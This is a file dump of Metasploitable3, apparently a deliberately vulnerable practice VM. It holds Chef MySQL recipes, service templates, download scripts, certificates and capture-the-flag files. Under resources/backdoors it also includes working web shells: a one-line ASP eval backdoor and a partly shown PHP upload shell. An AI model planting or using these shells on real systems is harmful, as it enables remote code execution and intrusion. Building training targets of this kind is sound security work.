7 | true 8 | end 9 | 10 | ################ 11 | # Type Constants 12 | ################ 13 | 14 | Boolean = property_type( 15 | is: [true, false], 16 | default: false 17 | ) unless defined?(Boolean) 18 | 19 | ################### 20 | # Common Properties 21 | ################### 22 | property :run_group, String, default: 'mysql', desired_state: false 23 | property :run_user, String, default: 'mysql', desired_state: false 24 | property :version, String, default: lazy { default_major_version }, desired_state: false 25 | property :include_dir, String, default: lazy { default_include_dir }, desired_state: false 26 | property :major_version, String, default: lazy { major_from_full(version) }, desired_state: false 27 | 28 | action_class 29 | end 30 | end 31 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/libraries/mysql_client_installation_package.rb: -------------------------------------------------------------------------------- 1 | module MysqlCookbook 2 | class MysqlClientInstallationPackage < MysqlBase 3 | # helper methods 4 | require_relative 'helpers' 5 | include MysqlCookbook::HelpersBase 6 | 7 | # Resource properties 8 | resource_name :mysql_client_installation_package 9 | provides :mysql_client_installation, os: 'linux' 10 | provides :mysql_client, os: 'linux' 11 | 12 | property :package_name, [String, Array], default: lazy { default_client_package_name }, desired_state: false 13 | property :package_options, [String, nil], desired_state: false 14 | property :package_version, [String, nil], default: nil, desired_state: false 15 | 16 | # Actions 17 | action :create do 18 | package new_resource.package_name do 19 | version new_resource.package_version if new_resource.package_version 20 | options new_resource.package_options if new_resource.package_options 21 | action :install 22 | end 23 | end 24 | 25 | action :delete do 26 | package new_resource.package_name do 27 | action :remove 28 | end 29 | end 30 | end 
31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/libraries/mysql_server_installation_package.rb: -------------------------------------------------------------------------------- 1 | module MysqlCookbook 2 | class MysqlServerInstallationPackage < MysqlBase 3 | # Resource properties 4 | resource_name :mysql_server_installation_package 5 | provides :mysql_server_installation, os: 'linux' 6 | 7 | property :package_name, String, default: lazy { default_server_package_name }, desired_state: false 8 | property :package_options, [String, nil], desired_state: false 9 | property :package_version, [String, nil], default: nil, desired_state: false 10 | 11 | # helper methods 12 | require_relative 'helpers' 13 | include MysqlCookbook::HelpersBase 14 | 15 | # Actions 16 | action :install do 17 | package new_resource.package_name do 18 | version new_resource.package_version if new_resource.package_version 19 | options new_resource.package_options if new_resource.package_options 20 | notifies :install, 'package[perl-Sys-Hostname-Long]', :immediately if platform_family?('suse') 21 | notifies :run, 'execute[Initial DB setup script]', :immediately if platform_family?('suse') 22 | action :install 23 | end 24 | 25 | package 'perl-Sys-Hostname-Long' do 26 | action :nothing 27 | end 28 | 29 | execute 'Initial DB setup script' do 30 | environment 'INSTANCE' => new_resource.name 31 | command '/usr/lib/mysql/mysql-systemd-helper install' 32 | action :nothing 33 | end 34 | end 35 | 36 | action :delete do 37 | package new_resource.package_name do 38 | action :remove 39 | end 40 | end 41 | end 42 | end 43 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/metadata.json: -------------------------------------------------------------------------------- 1 | {"name":"mysql","version":"8.5.1","description":"Provides mysql_service, mysql_config, and mysql_client 
resources","long_description":"","maintainer":"Chef Software, Inc.","maintainer_email":"cookbooks@chef.io","license":"Apache-2.0","platforms":{"redhat":">= 6.0","centos":">= 6.0","scientific":">= 6.0","oracle":">= 6.0","amazon":">= 0.0.0","fedora":">= 0.0.0","debian":">= 7.0","ubuntu":">= 12.04","opensuse":">= 13.0","opensuseleap":">= 0.0.0","suse":">= 12.0"},"dependencies":{},"recommendations":{},"suggestions":{},"conflicting":{},"providing":{},"replacing":{},"attributes":{},"groupings":{},"recipes":{},"source_url":"https://github.com/chef-cookbooks/mysql","issues_url":"https://github.com/chef-cookbooks/mysql/issues","chef_version":[[">= 12.7"]],"ohai_version":[]} -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/apparmor/usr.sbin.mysqld-instance.erb: -------------------------------------------------------------------------------- 1 | /etc/<%= @mysql_name %>/*.pem r, 2 | /etc/<%= @mysql_name %>/conf.d/ r, 3 | /etc/<%= @mysql_name %>/conf.d/* r, 4 | /etc/<%= @mysql_name %>/my.cnf r, 5 | <%= @config.log_dir %>/ r, 6 | <%= @config.log_dir %>/* rw, 7 | <%= @config.data_dir %>/ r, 8 | <%= @config.data_dir %>/** rwk, 9 | <%= @config.run_dir %>/** rw, 10 | <%= @config.pid_file %> rw, 11 | <%= @config.socket_file %> rw, 12 | /tmp/<%= @mysql_name %>/ r, 13 | /tmp/<%= @mysql_name %>/my.sql r, 14 | <%= @config.tmp_dir %>/* rw, 15 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/apparmor/usr.sbin.mysqld-local.erb: -------------------------------------------------------------------------------- 1 | #include 2 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/apparmor/usr.sbin.mysqld.erb: -------------------------------------------------------------------------------- 1 | # vim:syntax=apparmor 2 | # Last Modified: Tue Jun 19 17:37:30 2007 3 | #include 4 | 5 | 
/usr/sbin/mysqld { 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | capability dac_override, 13 | capability sys_resource, 14 | capability setgid, 15 | capability setuid, 16 | 17 | network tcp, 18 | 19 | /etc/hosts.allow r, 20 | /etc/hosts.deny r, 21 | 22 | /etc/mysql/*.pem r, 23 | /etc/mysql/conf.d/ r, 24 | /etc/mysql/conf.d/* r, 25 | /etc/mysql/*.cnf r, 26 | /usr/lib/mysql/plugin/ r, 27 | /usr/lib/mysql/plugin/*.so* mr, 28 | /usr/sbin/mysqld mr, 29 | /usr/share/mysql/** r, 30 | /var/log/mysql.log rw, 31 | /var/log/mysql.err rw, 32 | /var/lib/mysql/ r, 33 | /var/lib/mysql/** rwk, 34 | /var/log/mysql/ r, 35 | /var/log/mysql/* rw, 36 | /var/run/mysqld/mysqld.pid rw, 37 | /var/run/mysqld/mysqld.sock w, 38 | /var/run/mysqld/mysqld.sock.lock rw, 39 | /run/mysqld/mysqld.pid rw, 40 | /run/mysqld/mysqld.sock w, 41 | /run/mysqld/mysqld.sock.lock rw, 42 | 43 | /sys/devices/system/cpu/ r, 44 | 45 | # Site-specific additions and overrides. See local/README for details. 46 | #include 47 | } 48 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/smf/svc.method.mysqld.erb: -------------------------------------------------------------------------------- 1 | #!/sbin/sh 2 | # 3 | # Generated by Chef 4 | # 5 | 6 | . 
/lib/svc/share/smf_include.sh 7 | 8 | ulimit -n 10240 9 | 10 | case "$1" in 11 | start) 12 | <%= @mysqld_bin %> \ 13 | --defaults-file=<%= @defaults_file %> \ 14 | --basedir=<%= @base_dir %> \ 15 | --datadir=<%= @data_dir %> \ 16 | --pid-file=<%= @pid_file %> \ 17 | --log-error=<%= @error_log %> & 18 | ;; 19 | stop) 20 | [ -f <%= @pid_file %> ] && kill `/usr/bin/head -1 <%= @pid_file %>` 21 | ;; 22 | *) 23 | echo "Usage: $0 {start|stop}" >&2 24 | exit 1 25 | ;; 26 | esac 27 | 28 | exit $SMF_EXIT_OK 29 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/systemd/mysqld-wait-ready.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | daemon_pid="$1" 4 | 5 | # Wait for the server to come up or for the mysqld process to disappear 6 | ret=0 7 | while /bin/true; do 8 | RESPONSE=`/usr/bin/mysqladmin --no-defaults --socket="<%= @socket_file %>" --user=UNKNOWN_MYSQL_USER ping 2>&1` 9 | mret=$? 10 | if [ $mret -eq 0 ]; then 11 | break 12 | fi 13 | # exit codes 1, 11 (EXIT_CANNOT_CONNECT_TO_SERVICE) are expected, 14 | # anything else suggests a configuration error 15 | if [ $mret -ne 1 -a $mret -ne 11 ]; then 16 | ret=1 17 | break 18 | fi 19 | # "Access denied" also means the server is alive 20 | echo "$RESPONSE" | grep -q "Access denied for user" && break 21 | 22 | # Check process still exists 23 | if ! 
/bin/kill -0 $daemon_pid 2>/dev/null; then 24 | ret=1 25 | break 26 | fi 27 | sleep 1 28 | done 29 | 30 | exit $ret 31 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/systemd/mysqld.service.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=mysql_service[mysql-<%= @config.instance %>] 3 | After=syslog.target 4 | After=network.target 5 | 6 | [Service] 7 | Type=simple 8 | User=<%= @config.run_user %> 9 | Group=<%= @config.run_group %> 10 | ExecStart=<%= @mysqld_bin %> --defaults-file=<%= @etc_dir %>/my.cnf --basedir=<%= @base_dir %> 11 | ExecStartPost=/usr/libexec/mysql-<%= @config.instance %>-wait-ready $MAINPID 12 | TimeoutSec=300 13 | PrivateTmp=true 14 | 15 | [Install] 16 | WantedBy=multi-user.target 17 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/tmpfiles.d.conf.erb: -------------------------------------------------------------------------------- 1 | d <%= @run_dir %> 0755 <%= @run_user %> <%= @run_group %> - 2 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/upstart/mysqld-wait-ready.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Wait for the server to come up 4 | ret=0 5 | while /bin/true; do 6 | RESPONSE=`/usr/bin/mysqladmin --no-defaults --socket="<%= @socket_file %>" --user=UNKNOWN_MYSQL_USER ping 2>&1` 7 | mret=$? 
8 | if [ $mret -eq 0 ]; then 9 | break 10 | fi 11 | # exit codes 1, 11 (EXIT_CANNOT_CONNECT_TO_SERVICE) are expected, 12 | # anything else suggests a configuration error 13 | if [ $mret -ne 1 -a $mret -ne 11 ]; then 14 | ret=1 15 | break 16 | fi 17 | # "Access denied" also means the server is alive 18 | echo "$RESPONSE" | grep -q "Access denied for user" && break 19 | sleep 1 20 | done 21 | 22 | exit $ret 23 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/upstart/mysqld.erb: -------------------------------------------------------------------------------- 1 | # <%= @mysql_name %> Service 2 | 3 | description "MySQL service <%= @mysql_name %>" 4 | author "chef-client" 5 | 6 | start on runlevel [2345] 7 | stop on starting rc RUNLEVEL=[016] 8 | 9 | respawn 10 | respawn limit 2 5 11 | 12 | env HOME=/etc/<%= @mysql_name %> 13 | umask 007 14 | 15 | kill timeout 300 16 | 17 | pre-start script 18 | [ -d /run/<%= @mysql_name %> ] || install -m 755 -o <%= @run_user %> -g <%= @run_group %> -d /run/<%= @mysql_name %> 19 | [ -d <%= @socket_dir %> ] || install -m 755 -o <%= @run_user %> -g <%= @run_group %> -d <%= @socket_dir %> 20 | end script 21 | 22 | exec /usr/sbin/mysqld --defaults-file=<%= @defaults_file %> 23 | 24 | post-start script 25 | /usr/sbin/<%= @mysql_name %>-wait-ready 26 | end script 27 | -------------------------------------------------------------------------------- /cortex.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | info: 3 | title: Metasploitable3 4 | description: Metasploitable3 is a VM that is built from the ground up with a large 5 | amount of security vulnerabilities. 
6 | x-cortex-git: 7 | github: 8 | alias: r7org 9 | repository: rapid7/metasploitable3 10 | x-cortex-tag: metasploitable3 11 | x-cortex-type: service 12 | x-cortex-domain-parents: 13 | - tag: metasploit 14 | x-cortex-groups: 15 | - exposure:external-ship 16 | openapi: 3.0.1 17 | servers: 18 | - url: "/" 19 | -------------------------------------------------------------------------------- /iso/README.md: -------------------------------------------------------------------------------- 1 | ### What Is This Directory For? 2 | 3 | Download your Windows Server ISO images from TechNet/MSDN yourself and place them in this folder. This has to be done by hand because MSDN / TechNet are protected by Microsoft (Live) ID, which does not support HTTP basic authentication or the OAuth2 username / password flow. The direct-download links below are plain http://, so check each downloaded file against the SHA1 hash listed with it before using it. 4 | 5 | For example, you might want to start with one of the following: 6 | 7 | * Windows Server 2008 R2 + SP1: 8 | * File Name: en_windows_server_2008_r2_with_sp1_x64_dvd_617601.iso 9 | * SHA1 Hash: D3FD7BF85EE1D5BDD72DE5B2C69A7B470733CD0A 10 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=44782&activexDisabled=true&akamaiDL=false 11 | * Windows Server 2008 R2 + SP1 (Volume License): 12 | * File Name: en_windows_server_2008_r2_with_sp1_vl_build_x64_dvd_617403.iso 13 | * SHA1 Hash: 7E7E9425041B3328CCF723A0855C2BC4F462EC57 14 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=44783&activexDisabled=true&akamaiDL=false 15 | * Windows Server 2012: 16 | * File Name: en_windows_server_2012_x64_dvd_915478.iso 17 | * SHA1 Hash: D09E752B1EE480BC7E93DFA7D5C3A9B8AAC477BA 18 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=50539&activexDisabled=true&akamaiDL=false 19 | * Windows Server 2012 (Volume License): 20 | * File Name: en_windows_server_2012_vl_x64_dvd_917758.iso 21 | * SHA1 Hash: 
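063BC26ED45C50D3745CCAD52DD7B3F3CE13F36D 22 | * Direct Download: http://msdn.microsoft.com/subscriptions/json/GetDownloadRequest?brand=MSDN&locale=en-us&fileId=50573&activexDisabled=true&akamaiDL=false -------------------------------------------------------------------------------- /packer/scripts/virtio-win-drivers.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
#
# Download the virtio-win driver floppy image (.vfd) and extract its
# amd64/Win2008R2 drivers into resources/drivers/virtio/<release>/.
#
# Environment:
#   VIRTIO_SHA256  optional; expected SHA-256 of the .vfd image. When set, the
#                  download is checked against it before anything is
#                  extracted. The script carries no pinned digest of its own,
#                  so without this variable the image is trusted as served.
#
# Exit status: 0 on success or when the image is already present; 1 when a
# required tool is missing, the download fails or the digest does not match;
# otherwise the status of the 7z extraction.

# URI for downloading the latest WHQL'd Virtio drivers
virtio_release="virtio-win-0.1.117_amd64"
virtio_release_folder="virtio-win-0.1.117-1"
virtio_uri="https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/archive-virtio/${virtio_release_folder}/${virtio_release}.vfd"
virtio_image=".${virtio_release}.vfd"
# The transfer is written here first, so an interrupted download is never
# mistaken for a finished image on the next run.
virtio_partial="${virtio_image}.part"

# le flag
have_tools=true

# Tools messages
need_wget () {
  echo "Could not find wget, which is needed to download the virtio disk."
  echo "To install -"
  echo ""
  echo "Fedora: sudo dnf install wget"
  echo "Debian/Ubuntu: sudo apt install wget"
}

need_7z () {
  echo "Could not find 7z, which is required for extracting the virtio driver disk."
  echo "To install -"
  echo ""
  echo "Fedora: sudo dnf install p7zip p7zip-plugins"
  echo "Debian/Ubuntu: sudo apt install p7zip-full"
}

# Check for needed tools. Look them up on PATH instead of only in /usr/bin,
# so a wget or 7z installed elsewhere is not reported as missing.
if ! command -v wget >/dev/null 2>&1; then
  need_wget
  have_tools=false
fi

if ! command -v 7z >/dev/null 2>&1; then
  need_7z
  have_tools=false
fi

# Nothing was downloaded or extracted: report that through the exit status.
if [ "$have_tools" != true ]; then
  exit 1
fi

if [ -f "$virtio_image" ]; then
  echo "${virtio_image} already exists, skipping download."
  exit 0
fi

echo "Downloading and extracting virtio ${virtio_release} drivers."
# -c resumes a partial file left behind by an earlier interrupted run.
if ! wget -c "${virtio_uri}" -O "$virtio_partial"; then
  echo "Download of ${virtio_uri} failed." >&2
  exit 1
fi

if [ -n "${VIRTIO_SHA256:-}" ]; then
  if ! command -v sha256sum >/dev/null 2>&1; then
    echo "VIRTIO_SHA256 is set but sha256sum was not found." >&2
    exit 1
  fi
  if ! printf '%s  %s\n' "$VIRTIO_SHA256" "$virtio_partial" | sha256sum -c - >/dev/null; then
    echo "SHA-256 mismatch for ${virtio_partial}; not extracting it." >&2
    # Drop the bad file so the next run downloads it again from scratch.
    rm -f -- "$virtio_partial"
    exit 1
  fi
fi

mv -- "$virtio_partial" "$virtio_image" || exit 1
7z x -oresources/drivers/virtio/"${virtio_release}" "$virtio_image" amd64/Win2008R2
-------------------------------------------------------------------------------- /resources/apache_struts/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 24 | 25 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /resources/apache_struts/struts2-rest-showcase.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/apache_struts/struts2-rest-showcase.war -------------------------------------------------------------------------------- /resources/backdoors/caidao.asp: -------------------------------------------------------------------------------- 1 | <%eval request("password")%> -------------------------------------------------------------------------------- /resources/backdoors/meterpreter.php: -------------------------------------------------------------------------------- 1 | /*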

'.php_uname().'
'; 3 | echo '
'; 4 | echo '
'; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'uplod d0n3 in SAME file // Th3 MMA \\

'; } 7 | else { echo 'Upload GAGAL !!!

'; 8 | } } 9 | ?> 10 | -------------------------------------------------------------------------------- /resources/certs/COMODORSAAddTrustCA.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/COMODORSAAddTrustCA.crt -------------------------------------------------------------------------------- /resources/certs/COMODORSAExtendedValidationSecureServerCA.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/COMODORSAExtendedValidationSecureServerCA.crt -------------------------------------------------------------------------------- /resources/certs/addtrust_external_ca.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/addtrust_external_ca.cer -------------------------------------------------------------------------------- /resources/certs/baltimore_ca.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/baltimore_ca.cer -------------------------------------------------------------------------------- /resources/certs/digicert.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/digicert.cer -------------------------------------------------------------------------------- /resources/certs/equifax.cer: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/equifax.cer -------------------------------------------------------------------------------- /resources/certs/gdig2.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIE0DCCA7igAwIBAgIBBzANBgkqhkiG9w0BAQsFADCBgzELMAkGA1UEBhMCVVMx 3 | EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoT 4 | EUdvRGFkZHkuY29tLCBJbmMuMTEwLwYDVQQDEyhHbyBEYWRkeSBSb290IENlcnRp 5 | ZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTExMDUwMzA3MDAwMFoXDTMxMDUwMzA3 6 | MDAwMFowgbQxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6b25hMRMwEQYDVQQH 7 | EwpTY290dHNkYWxlMRowGAYDVQQKExFHb0RhZGR5LmNvbSwgSW5jLjEtMCsGA1UE 8 | CxMkaHR0cDovL2NlcnRzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkvMTMwMQYDVQQD 9 | EypHbyBEYWRkeSBTZWN1cmUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IC0gRzIwggEi 10 | MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC54MsQ1K92vdSTYuswZLiBCGzD 11 | BNliF44v/z5lz4/OYuY8UhzaFkVLVat4a2ODYpDOD2lsmcgaFItMzEUz6ojcnqOv 12 | K/6AYZ15V8TPLvQ/MDxdR/yaFrzDN5ZBUY4RS1T4KL7QjL7wMDge87Am+GZHY23e 13 | cSZHjzhHU9FGHbTj3ADqRay9vHHZqm8A29vNMDp5T19MR/gd71vCxJ1gO7GyQ5HY 14 | pDNO6rPWJ0+tJYqlxvTV0KaudAVkV4i1RFXULSo6Pvi4vekyCgKUZMQWOlDxSq7n 15 | eTOvDCAHf+jfBDnCaQJsY1L6d8EbyHSHyLmTGFBUNUtpTrw700kuH9zB0lL7AgMB 16 | AAGjggEaMIIBFjAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNV 17 | HQ4EFgQUQMK9J47MNIMwojPX+2yz8LQsgM4wHwYDVR0jBBgwFoAUOpqFBxBnKLbv 18 | 9r0FQW4gwZTaD94wNAYIKwYBBQUHAQEEKDAmMCQGCCsGAQUFBzABhhhodHRwOi8v 19 | b2NzcC5nb2RhZGR5LmNvbS8wNQYDVR0fBC4wLDAqoCigJoYkaHR0cDovL2NybC5n 20 | b2RhZGR5LmNvbS9nZHJvb3QtZzIuY3JsMEYGA1UdIAQ/MD0wOwYEVR0gADAzMDEG 21 | CCsGAQUFBwIBFiVodHRwczovL2NlcnRzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkv 22 | MA0GCSqGSIb3DQEBCwUAA4IBAQAIfmyTEMg4uJapkEv/oV9PBO9sPpyIBslQj6Zz 23 | 91cxG7685C/b+LrTW+C05+Z5Yg4MotdqY3MxtfWoSKQ7CC2iXZDXtHwlTxFWMMS2 24 | RJ17LJ3lXubvDGGqv+QqG+6EnriDfcFDzkSnE3ANkR/0yBOtg2DZ2HKocyQetawi 25 | 
DsoXiWJYRBuriSUBAA/NxBti21G00w9RKpv0vHP8ds42pM3Z2Czqrpv1KrKQ0U11 26 | GIo/ikGQI31bS/6kA1ibRrLDYGCD+H1QQc7CoZDDu+8CL9IVVO5EFdkKrqeKM+2x 27 | LXY2JtwE65/3YR8V3Idv7kaWKK2hJn0KCacuBKONvPi8BDAB 28 | -----END CERTIFICATE----- -------------------------------------------------------------------------------- /resources/certs/globalsign.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/globalsign.cer -------------------------------------------------------------------------------- /resources/certs/gte_cybertrust.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/gte_cybertrust.cer -------------------------------------------------------------------------------- /resources/certs/microsoft_root_2011.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/microsoft_root_2011.cer -------------------------------------------------------------------------------- /resources/certs/oracle-cert.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/oracle-cert.cer -------------------------------------------------------------------------------- /resources/certs/thawte_primary_root.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/thawte_primary_root.cer -------------------------------------------------------------------------------- 
/resources/certs/utn-userfirst.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/certs/utn-userfirst.cer -------------------------------------------------------------------------------- /resources/download-windows-files.ps1: -------------------------------------------------------------------------------- 1 | $Logfile = "C:\Windows\Temp\wmf-install.log" 2 | function LogWrite { 3 | Param ([string]$logstring) 4 | $now = Get-Date -format s 5 | Add-Content $Logfile -value "$now $logstring" 6 | Write-Host $logstring 7 | } 8 | 9 | LogWrite "Downloading dotNet 4.5.2" 10 | try { 11 | (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe', 'windows_pre_downloads/dotnet.exe') 12 | } catch { 13 | LogWrite $_.Exception | Format-List -force 14 | LogWrite "Failed to download file." 15 | } 16 | 17 | LogWrite "Downloading Windows Management Framework 5.1" 18 | try { 19 | (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip', 'windows_pre_downloads/wmf.zip') 20 | } catch { 21 | LogWrite $_.Exception | Format-List -force 22 | LogWrite "Failed to download file." 
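23 | } 24 | -------------------------------------------------------------------------------- /resources/download-windows-files.sh: --------------------------------------------------------------------------------
#!/bin/bash
#
# Fetch the .NET 4.5.2 installer and the Windows Management Framework 5.1
# package into windows_pre_downloads/ (the directory must already exist).
#
# NOTE(review): neither file is checked against a known digest or signature
# after download, and this page gives no expected hashes for them. Pin the
# digests here once they have been obtained from a trusted source.

# Set the options here rather than in the shebang: a "-e" on the shebang line
# is lost when the script is started as "bash download-windows-files.sh".
set -euo pipefail

# --fail makes curl exit non-zero on an HTTP error instead of saving the
# server's error page under the installer's file name.
curl --fail -L --output windows_pre_downloads/dotnet.exe https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe
curl --fail -L --output windows_pre_downloads/wmf.zip https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip
-------------------------------------------------------------------------------- /resources/flags/ace_of_hearts.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/ace_of_hearts.jpg -------------------------------------------------------------------------------- /resources/flags/four_of_clubs.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/four_of_clubs.wav -------------------------------------------------------------------------------- /resources/flags/hahaha.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/hahaha.jpg -------------------------------------------------------------------------------- /resources/flags/jack_of_clubs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/jack_of_clubs.png -------------------------------------------------------------------------------- 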
/resources/flags/jack_of_hearts.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/jack_of_hearts.docx -------------------------------------------------------------------------------- /resources/flags/kingofclubs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/kingofclubs.exe -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/10 of clubs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/10_of_clubs/10 of clubs.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/10_of_clubs.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/10_of_clubs/10_of_clubs.wav -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/extracted_flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/10_of_clubs/extracted_flag.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/10_of_clubs/get_flag.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | #!/usr/bin/env ruby 3 | 4 | require 'zlib' 

# Reads the whole file +fname+ and returns its contents as a String.
# NOTE(review): File.read opens the file in text mode. Whether the offsets
# used further down depend on that is not visible here; confirm before
# switching to a binary read.
def load_wav(fname)
  File.read(fname)
end

# Returns the index of the first occurrence of the string 'data' in +wav+,
# plus one. Raises NoMethodError when 'data' does not occur, because
# String#index then returns nil.
def find_data_chunk_offset(wav)
  wav.index('data') + 1
end

# Takes the 4-character slice of +wav+ that starts at the offset found above
# and decodes it as one 32-bit unsigned big-endian integer ('N').
def get_data_chunk_size(wav)
  data_chunk_offset = find_data_chunk_offset(wav)
  wav[data_chunk_offset, 4].unpack('N').first
end

# Returns the slice of +wav+ that starts 7 positions after the offset found
# above and is +chunk_size+ long (shorter if +wav+ ends first).
def extract_data_chunk(wav)
  chunk_offset = find_data_chunk_offset(wav)
  chunk_size = get_data_chunk_size(wav)

  wav[chunk_offset + 4 + 3, chunk_size]
end

# Usage: get_flag.rb <input.wav> <output file>
# The arguments are not checked: when one is missing, ARGV.shift returns nil
# and the File call that receives it raises.
wav_fname = ARGV.shift
output = ARGV.shift

wav = load_wav(wav_fname)
data_chunk = extract_data_chunk(wav)
# The extracted slice is treated as zlib-compressed data. Inflate is called
# without any limit on the size of the decompressed output.
data_chunk = Zlib::Inflate.inflate(data_chunk)

# 'wb' writes the inflated bytes unchanged.
File.open(output, 'wb') do |f|
  f.write(data_chunk)
end

puts "#{output} written"
